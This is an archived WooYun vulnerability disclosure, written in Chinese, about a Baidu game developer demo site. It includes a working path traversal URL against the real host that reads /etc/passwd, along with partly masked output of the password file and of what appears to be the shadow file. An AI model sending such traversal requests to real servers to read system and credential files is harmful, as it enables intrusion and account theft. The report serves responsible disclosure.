乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-13: 细节已通知厂商并且等待厂商处理中 2015-12-13: 厂商已经确认,细节仅向厂商公开 2015-12-23: 细节向核心白帽子及相关领域专家公开 2016-01-02: 细节向普通白帽子公开 2016-01-12: 细节向实习白帽子公开 2016-01-25: 细节向公众公开
打卡
http://youxi.baidu.com/developerDemo/demo.jsp
我猜这个页面应该是保密的
*****^^******************************^^认证之前PO********************y=27dccf180127259d89d********************^^序后,request^********************e0736700serverId=1********** **********824610124382461e60002,则^********** **********^时之间以外的全部空格********** **********cf180127259d89d81737e0736********** **********^^成的MD5值为(全转大^*****
http://youxi.baidu.com/developerDemo/demoDownload.jsp?file=../../../../../../../../../../../../../../../etc/passwd
*****:/root:/**********bin:/sbi**********:/sbin:/sb**********r/adm:/sb**********ool/lpd:/s**********:/sbin:/**********wn:/sbin:/s**********:/sbin:/**********/spool/mail**********spool/uucp:/**********tor:/root:/**********/usr/games:**********var/gopher:/**********ser:/:/sb**********body:/:/s**********memory owner:/d**********r":/var/empty/**********pool/postfix**********d SSH:/var/empty**********/var/cache/rpc********** User:/var/lib********** NFS User:/var/li**********/ntp:/sbi**********::/:/sbi**********be used by OProfile:/**********sage bus:/:/********** daemon:/:/**********ck:/var/run/avahi-**********aemon:/:/s**********home/work**********ool/exim:/s**********ome/www:/**********ome/memcache*****
*****HB5G3fhT5qungLhmNI8Neu21N5UnQ**********:0:999**********3:0:999**********:0:999**********0:9999**********3:0:99**********513:0:9**********3:0:99**********3:0:99**********3:0:99**********513:0:9**********:0:9999**********3:0:999**********:0:999**********3:0:999**********5734:**********:15734**********15734:**********5734:**********4:0:99**********15734:**********!:1573**********734::**********15734:**********:15734**********5734:**********!:1573**********15734**********5734:**********:0:9999**********6653:**********1:0:99**********671:0:99*****
危害等级:高
漏洞Rank:15
确认时间:2015-12-13 21:33
感谢对百度安全的关注
暂无